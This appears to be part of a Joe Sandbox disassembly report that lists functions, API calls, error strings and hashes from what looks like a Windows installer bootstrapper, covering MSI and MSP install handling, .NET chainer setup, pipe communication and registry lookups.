Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _wcschr$CriticalSection$EnterLeavelstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 144789458-2050445661
Opcode ID: dad6d48742d1de94f7dadae826df546d2cddeed64bdbc30d81bfe9d991e5c075
Instruction ID: b7f104cc78c07db05fdaa384a6a812bbf1323c27654d6f333e94fb03ed2819e8
Opcode Fuzzy Hash: dad6d48742d1de94f7dadae826df546d2cddeed64bdbc30d81bfe9d991e5c075
Instruction Fuzzy Hash: 37C12A72D4022ABBDF21AA94CC49FAE7779EF04751F15412AFE10B7181DA318E40EBD2

Function 00CAD274 Relevance: 53.0, APIs: 1, Strings: 29, Instructions: 465COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CAD2D2

Part of subcall function 00CC536F: _memset.LIBCMT ref: 00CC5380

Strings

Failed to add reboot suppression property on install., xrefs: 00CAD60E
REINSTALL=ALL, xrefs: 00CAD624, 00CAD69B
ACTION=ADMIN, xrefs: 00CAD74E
Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 00CAD65D
Failed to add feature action properties to obfuscated argument string., xrefs: 00CAD537
%ls %ls=ALL, xrefs: 00CAD703, 00CAD7DE
Failed to add feature action properties to argument string., xrefs: 00CAD515
%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00CAD6D4
Failed to add patch properties to obfuscated argument string., xrefs: 00CAD57B
VersionString, xrefs: 00CAD31D, 00CAD352
Failed to add reboot suppression property on uninstall., xrefs: 00CAD7C6
Failed to add the list of dependencies to ignore to the properties., xrefs: 00CAD717
Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 00CAD6E8
Failed to enable logging for package: %ls to: %ls, xrefs: 00CAD479
Failed to add obfuscated properties to argument string., xrefs: 00CAD4F3
Failed to initialize external UI handler., xrefs: 00CAD448
Failed to get cached path for package: %ls, xrefs: 00CAD3DB
REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 00CAD646
Failed to add reinstall all property on minor upgrade., xrefs: 00CAD63B
Failed to add properties to argument string., xrefs: 00CAD4BA
IGNOREDEPENDENCIES, xrefs: 00CAD6F2, 00CAD7CD
Failed to install MSI package., xrefs: 00CAD791
Failed to perform minor upgrade of MSI package., xrefs: 00CAD689
Failed to uninstall MSI package., xrefs: 00CAD838
Failed to add patch properties to argument string., xrefs: 00CAD559
Failed to build MSI path., xrefs: 00CAD411
REBOOT=ReallySuppress, xrefs: 00CAD5F3, 00CAD7AF
Failed to add ADMIN property on admin install., xrefs: 00CAD769
Failed to run maintanance mode for MSI package., xrefs: 00CAD743

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString
API String ID: 2102423945-2112609193
Opcode ID: b124be0b8d69a3535d66c50ff281eb14bb3e6edfdb3fcd754918a2bf19ad9656
Instruction ID: 51ef9e1804e505c64a48106a170abb231bda49b5a8804dabedf425b27e9c3cc5
Opcode Fuzzy Hash: b124be0b8d69a3535d66c50ff281eb14bb3e6edfdb3fcd754918a2bf19ad9656
Instruction Fuzzy Hash: A002D571600616EFDF21EF90CC85EA9B7B6EB99704F1404AAF10BA3561D7729E90EF40

Function 00CB533E Relevance: 51.0, APIs: 13, Strings: 16, Instructions: 294COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CB5399
UuidCreate.RPCRT4(?), ref: 00CB53B1
StringFromGUID2.OLE32(?,?,00000027), ref: 00CB53D2
CloseHandle.KERNEL32(?,NetFxChainer.cpp,000001A8,00000000,?,?,?,?), ref: 00CB56D4
CloseHandle.KERNEL32(?,NetFxChainer.cpp,000001A8,00000000,?,?,?,?), ref: 00CB56EA

Strings

Failed to CreateProcess on path: %ls, xrefs: 00CB54F7
NetFxChainer.cpp, xrefs: 00CB53E7, 00CB54EA, 00CB55F0, 00CB5679
NetFxSection.%ls, xrefs: 00CB5402
Failed to create netfx chainer., xrefs: 00CB545C
%ls /pipe %ls, xrefs: 00CB5478
Failed to allocate section name., xrefs: 00CB5418
Failed to allocate event name., xrefs: 00CB543D
Failed to wait for netfx chainer process to complete, xrefs: 00CB5683
Failed to allocate netfx chainer arguments., xrefs: 00CB548C
Failed to convert netfx chainer guid into string., xrefs: 00CB53F1
D, xrefs: 00CB54AE
Failed to process netfx chainer message., xrefs: 00CB554B
Failed to send internal error message from netfx chainer., xrefs: 00CB564D
Failed to create netfx chainer guid., xrefs: 00CB53BE
Failed to get netfx return code., xrefs: 00CB55FA
NetFxEvent.%ls, xrefs: 00CB5429

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$CreateFromStringUuid_memset
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to send internal error message from netfx chainer.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 2223292257-4284037740
Opcode ID: 739f9daf5deeedd98388fb8b19545227ac4b585ddc5ef01514acb76f4b93360a
Instruction ID: 02f3da4b9d9a34f283155ba0d104aabbba0d37f479bcb4baa39fa2c5962909d9
Opcode Fuzzy Hash: 739f9daf5deeedd98388fb8b19545227ac4b585ddc5ef01514acb76f4b93360a
Instruction Fuzzy Hash: 41A1B271A40719AFDB219BA4CC45FEEBBB9AF08701F10406AF609EB251D7719D44DF11

Function 00C979F5 Relevance: 44.1, APIs: 8, Strings: 17, Instructions: 313registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97A32
_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97A58
RegCloseKey.ADVAPI32(00C98B96,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00C97D5D

Strings

Failed to clear variable., xrefs: 00C97AB3
Failed to allocate string buffer., xrefs: 00C97C4E
Registry key not found. Key = '%ls'; variable = '%ls', xrefs: 00C97A8D
Failed to get expand environment string., xrefs: 00C97CC3
Failed to format key string., xrefs: 00C97A3D
Failed to set variable., xrefs: 00C97D15
Failed to query registry key value., xrefs: 00C97BC1
Failed to query registry key value size., xrefs: 00C97B3D
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00C97AF9
Failed to read registry value., xrefs: 00C97CDE
Failed to open registry key., xrefs: 00C97AC8
Failed to change value type., xrefs: 00C97CF7
Unsupported registry key value type. Type = '%u', xrefs: 00C97BE9
search.cpp, xrefs: 00C97B33, 00C97B67, 00C97BB7, 00C97CB9
Failed to format value string., xrefs: 00C97A63
Failed to allocate memory registry value., xrefs: 00C97B71
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 00C97D2A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'; variable = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-822975546
Opcode ID: d879a1127eb34adc6e0d7db8dac8a80e9320ca0f4b7f8405b3295d991df7a77a
Instruction ID: a6708c9dc47001efebcecc07d0c0d4c306564003cdf6a7aa9a08e9c32f0c857b
Opcode Fuzzy Hash: d879a1127eb34adc6e0d7db8dac8a80e9320ca0f4b7f8405b3295d991df7a77a
Instruction Fuzzy Hash: 02A1C272D5621AFBDF129BA4CC0AFAE7B79AF04710F144279F910B6190D631CF41ABA0

Function 00C92BC3 Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 232filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(CB4FE856,00000000,00C9130D,80070642,?,00C9BDAF,00C9130D,?,75C0B390,?,?,00C9130D), ref: 00C92BE4
GetCurrentProcessId.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?,?,00C9130D), ref: 00C92BEF
SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92C2B
ConnectNamedPipe.KERNEL32(?,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92C46
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92C50
Sleep.KERNEL32(00000064,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92C7B
SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92CB3
WriteFile.KERNEL32(?,?,00000004,000000FF,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92CD4
WriteFile.KERNEL32(?,75C0B390,?,000000FF,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92CF5
WriteFile.KERNEL32(?,?,00000004,000000FF,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92D16
ReadFile.KERNEL32(?,00C9130D,00000004,000000FF,00000000,?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92D37
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92D76
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92DA9
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92DDC
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92E0F
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92E3F
GetLastError.KERNEL32(?,00C9BDAF,00C9130D,?,75C0B390,?), ref: 00C92E6F

Strings

Failed to reset pipe to blocking., xrefs: 00C92DD2
Failed to write our process id to pipe., xrefs: 00C92E68
Failed to read ACK from pipe., xrefs: 00C92E98
pipe.cpp, xrefs: 00C92D62, 00C92D95, 00C92DC8, 00C92DFB, 00C92E2E, 00C92E5E, 00C92E8E
Failed to write secret length to pipe., xrefs: 00C92E05
Failed to write secret to pipe., xrefs: 00C92E38
Failed to wait for child to connect to pipe., xrefs: 00C92D6C
Failed to set pipe to non-blocking., xrefs: 00C92D9F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$pipe.cpp
API String ID: 2944378912-2009266399
Opcode ID: 62020a0aca5f817dd3c3520b2122a492c62e679f5932aa0e84b03f8c5cf00614
Instruction ID: 426d03ecb414a4dd397743cb20ad0c08e5c4b96c936cf9b1c43fc7d4326e2cde
Opcode Fuzzy Hash: 62020a0aca5f817dd3c3520b2122a492c62e679f5932aa0e84b03f8c5cf00614
Instruction Fuzzy Hash: 0571A176A4021ABBDF109F99DC8EF9E7BB8AF04B51F184069F954E6190D770CE009BA1

Function 00CBA00B Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00CB83B1), ref: 00CBA013
__mtterm.LIBCMT ref: 00CBA01F

Part of subcall function 00CB9D58: DecodePointer.KERNEL32(00000005,00CBA181,?,00CB83B1), ref: 00CB9D69
Part of subcall function 00CB9D58: TlsFree.KERNEL32(00000011,00CBA181,?,00CB83B1), ref: 00CB9D83
Part of subcall function 00CB9D58: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00CBA181,?,00CB83B1), ref: 00CBBD08
Part of subcall function 00CB9D58: _free.LIBCMT ref: 00CBBD0B
Part of subcall function 00CB9D58: DeleteCriticalSection.KERNEL32(00000011,76EF5810,?,00CBA181,?,00CB83B1), ref: 00CBBD32

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CBA035
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CBA042
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CBA04F
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CBA05C
TlsAlloc.KERNEL32(?,00CB83B1), ref: 00CBA0AC
TlsSetValue.KERNEL32(00000000,?,00CB83B1), ref: 00CBA0C7
__init_pointers.LIBCMT ref: 00CBA0D1
EncodePointer.KERNEL32(?,00CB83B1), ref: 00CBA0E2
EncodePointer.KERNEL32(?,00CB83B1), ref: 00CBA0EF
EncodePointer.KERNEL32(?,00CB83B1), ref: 00CBA0FC
EncodePointer.KERNEL32(?,00CB83B1), ref: 00CBA109
DecodePointer.KERNEL32(00CB9EDC,?,00CB83B1), ref: 00CBA12A
__calloc_crt.LIBCMT ref: 00CBA13F
DecodePointer.KERNEL32(00000000,?,00CB83B1), ref: 00CBA159
GetCurrentThreadId.KERNEL32 ref: 00CBA16B

Strings

FlsSetValue, xrefs: 00CBA044
FlsGetValue, xrefs: 00CBA037
FlsFree, xrefs: 00CBA051
FlsAlloc, xrefs: 00CBA02F
PNv, xrefs: 00CBA119
KERNEL32.DLL, xrefs: 00CBA00E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
API String ID: 3698121176-2259100434
Opcode ID: b54a4715ab773ce984b12e0320debeeb0315229caf40e7fac7ba23091aed558a
Instruction ID: 221dc9a6ee036f30ce7e883d1ff6095fbe17f119ab285f369ca3ff5d6e11bea6
Opcode Fuzzy Hash: b54a4715ab773ce984b12e0320debeeb0315229caf40e7fac7ba23091aed558a
Instruction Fuzzy Hash: 653160719043959EC721AFB9FC8DB8E3FE4EB64351F14062AE454AA1F0DB708841EB51

Function 00CB5073 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 232synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000018,00000001,00000000,00000000,00000000,?,?,00CB5456,?,?,?), ref: 00CB50B1
GetLastError.KERNEL32(?,?,00CB5456,?,?,?), ref: 00CB50BE
ReleaseMutex.KERNEL32(?), ref: 00CB532A

Strings

NetFxChainer.cpp, xrefs: 00CB5096, 00CB50E0, 00CB5148, 00CB51B8, 00CB520B, 00CB5254
%ls_send, xrefs: 00CB50F5
failed to allocate memory for event name, xrefs: 00CB5109
failed to allocate memory for mutex name, xrefs: 00CB5179
failed to copy event name to shared memory structure., xrefs: 00CB528D
Failed to create mutex: %ls, xrefs: 00CB51C5
%ls_mutex, xrefs: 00CB5165
Failed to memory map cabinet file: %ls, xrefs: 00CB5218
Failed to allocate memory for NetFxChainer struct., xrefs: 00CB50A0
Failed to MapViewOfFile for %ls., xrefs: 00CB5261
Failed to create event: %ls, xrefs: 00CB5155

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: c5cf9f4126b1a239d23b0655a8753cc7c04cae46c13ba80a7cf0aea9d909af87
Instruction ID: 20f119734a2ecb50535261cbae6df4fe98001af40634d1e0c48d8b30e26d6a2d
Opcode Fuzzy Hash: c5cf9f4126b1a239d23b0655a8753cc7c04cae46c13ba80a7cf0aea9d909af87
Instruction Fuzzy Hash: 8171F2B2280745EFC720AF64CC8AFAE3BB5AB44300F25483DF626DB291D675DD45A721

Function 00CB4652 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 337COMMON

Download Yara Rule

Strings

Failed to allocate space for burn payload inside of related bundle struct, xrefs: 00CB46D4
Failed to copy version for pseudo bundle., xrefs: 00CB4A03
Failed to copy repair arguments for related bundle package, xrefs: 00CB48E3
Failed to allocate memory for pseudo bundle payload hash., xrefs: 00CB47CA
Failed to copy install arguments for related bundle package, xrefs: 00CB489B
Failed to copy key for pseudo bundle., xrefs: 00CB485C
Failed to append relation type to install arguments for related bundle package, xrefs: 00CB48BC
Failed to copy display name for pseudo bundle., xrefs: 00CB4A24
Failed to copy key for pseudo bundle payload., xrefs: 00CB4716
-%ls, xrefs: 00CB466A
Failed to allocate memory for dependency providers., xrefs: 00CB49BD
Failed to copy download source for pseudo bundle., xrefs: 00CB478A
Failed to copy local source path for pseudo bundle., xrefs: 00CB475C
Failed to copy filename for pseudo bundle., xrefs: 00CB4739
pseudobundle.cpp, xrefs: 00CB4697, 00CB46CA, 00CB47C0, 00CB49B3
Failed to copy uninstall arguments for related bundle package, xrefs: 00CB4935
Failed to append relation type to repair arguments for related bundle package, xrefs: 00CB4904
Failed to copy cache id for pseudo bundle., xrefs: 00CB487A
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 00CB4956
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 00CB46A1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: cdf0f40ca596e8490f546d4ac1d03a0a283a191b7022c0e263460ea86c9a6dce
Instruction ID: 0aa326a58ccd2758353061652242c59d92eabeec700acd661a6c162838a803fd
Opcode Fuzzy Hash: cdf0f40ca596e8490f546d4ac1d03a0a283a191b7022c0e263460ea86c9a6dce
Instruction Fuzzy Hash: 0FC1D331684705EFDB25DF65C885F9676F9AF45700F14442EFA16AB392EB70E840EB10

Function 00CAE0D4 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 320COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CAE142

Strings

Failed to add reboot suppression property on install., xrefs: 00CAE3FD
Failed to semi-colon delimit patches., xrefs: 00CAE2AC
Failed to install MSP package., xrefs: 00CAE429
%ls %ls=ALL, xrefs: 00CAE460
Failed to add properties to argument string., xrefs: 00CAE31E
Failed to get cached path for MSP package: %ls, xrefs: 00CAE285
IGNOREDEPENDENCIES, xrefs: 00CAE44F
" REBOOT=ReallySuppress, xrefs: 00CAE3E6
Failed to uninstall MSP package., xrefs: 00CAE49C
Failed to add patches to PATCH property on install., xrefs: 00CAE3DB
Failed to add PATCH property on install., xrefs: 00CAE3B8
REBOOT=ReallySuppress, xrefs: 00CAE431
Failed to build MSP path., xrefs: 00CAE29A
Failed to add reboot suppression property on uninstall., xrefs: 00CAE448
Failed to append patch., xrefs: 00CAE2B3
Failed to add the list of dependencies to ignore to the properties., xrefs: 00CAE474
Failed to enable logging for package: %ls to: %ls, xrefs: 00CAE2E0
Failed to initialize external UI handler., xrefs: 00CAE1A7
Failed to add properties to obfuscated argument string., xrefs: 00CAE354
PATCH=", xrefs: 00CAE3A1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: PATCH="$ REBOOT=ReallySuppress$" REBOOT=ReallySuppress$%ls %ls=ALL$Failed to add PATCH property on install.$Failed to add patches to PATCH property on install.$Failed to add properties to argument string.$Failed to add properties to obfuscated argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add the list of dependencies to ignore to the properties.$Failed to append patch.$Failed to build MSP path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for MSP package: %ls$Failed to initialize external UI handler.$Failed to install MSP package.$Failed to semi-colon delimit patches.$Failed to uninstall MSP package.$IGNOREDEPENDENCIES
API String ID: 2102423945-1976012679
Opcode ID: ea47465a9edb9f60c2711fb2e285c2e40f50d877373e0195b7cfffcc448e605e
Instruction ID: 101fa685dcfa132a6493c9ba585edbcc6c48bb153f9001f8df5659a429bbc3b3
Opcode Fuzzy Hash: ea47465a9edb9f60c2711fb2e285c2e40f50d877373e0195b7cfffcc448e605e
Instruction Fuzzy Hash: 89C1B770A00629DFDF219F95CC81F99B7BBBB99314F1441E9F109A3251D6729EA0DF80

Function 00CA67ED Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 416COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,?,00000001,00CA75F1,?,?,00000000,?,?,?,?,00CA75F1,00000000,?,?), ref: 00CA6820

Strings

Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00CA6BEE
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00CA6A86
Failed to set symbol value., xrefs: 00CA6B66
condition.cpp, xrefs: 00CA68CF, 00CA698B, 00CA6A0D, 00CA6A6C, 00CA6BD4, 00CA6C03, 00CA6C54
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00CA68E9
NOT, xrefs: 00CA6B22
AND, xrefs: 00CA6B02
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 00CA6A27
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 00CA6C1D
@, xrefs: 00CA6826
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00CA6C6E
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00CA69A5

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
